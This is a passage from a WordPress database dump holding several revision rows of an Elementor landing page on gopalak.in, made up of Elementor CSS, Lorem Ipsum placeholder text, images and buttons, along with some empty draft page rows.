10:50:34','',1350,'https://gopalak.in/?p=1360',0,'revision','',0),(1362,1,'2022-09-20 16:35:57','2022-09-20 11:05:57','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy text </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 16:35:57','2022-09-20 11:05:57','',1350,'https://gopalak.in/?p=1362',0,'revision','',0),(1363,1,'2022-09-20 16:35:57','2022-09-20 11:05:57','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy text </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 16:35:57','2022-09-20 11:05:57','',1350,'https://gopalak.in/?p=1363',0,'revision','',0),(1364,1,'2022-09-20 16:35:57','2022-09-20 11:05:57','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 16:35:57','2022-09-20 11:05:57','',1350,'https://gopalak.in/?p=1364',0,'revision','',0),(1365,1,'2022-09-20 16:39:18','0000-00-00 00:00:00','','Elementor #1365','','draft','closed','closed','','','','','2022-09-20 16:39:18','2022-09-20 11:09:18','',0,'https://gopalak.in/?page_id=1365',0,'page','',0),(1366,1,'2022-09-20 16:37:25','2022-09-20 11:07:25','','Elementor #1365','','inherit','closed','closed','','1365-revision-v1','','','2022-09-20 16:37:25','2022-09-20 11:07:25','',1365,'https://gopalak.in/?p=1366',0,'revision','',0),(1367,1,'2022-09-20 16:43:07','0000-00-00 00:00:00','','Elementor #1367','','draft','closed','closed','','','','','2022-09-20 16:43:07','2022-09-20 11:13:07','',0,'https://gopalak.in/?page_id=1367',0,'page','',0),(1368,1,'2022-09-20 16:41:42','2022-09-20 11:11:42','','Elementor #1367','','inherit','closed','closed','','1367-revision-v1','','','2022-09-20 16:41:42','2022-09-20 11:11:42','',1367,'https://gopalak.in/?p=1368',0,'revision','',0),(1370,1,'2022-09-20 17:48:37','2022-09-20 12:18:37','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','landing page','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 17:48:37','2022-09-20 12:18:37','',1350,'https://gopalak.in/?p=1370',0,'revision','',0),(1371,1,'2022-09-21 10:11:05','0000-00-00 00:00:00','','Elementor #1371','','draft','closed','closed','','','','','2022-09-21 10:11:05','2022-09-21 04:41:05','',0,'https://gopalak.in/?page_id=1371',0,'page','',0),(1372,1,'2022-09-21 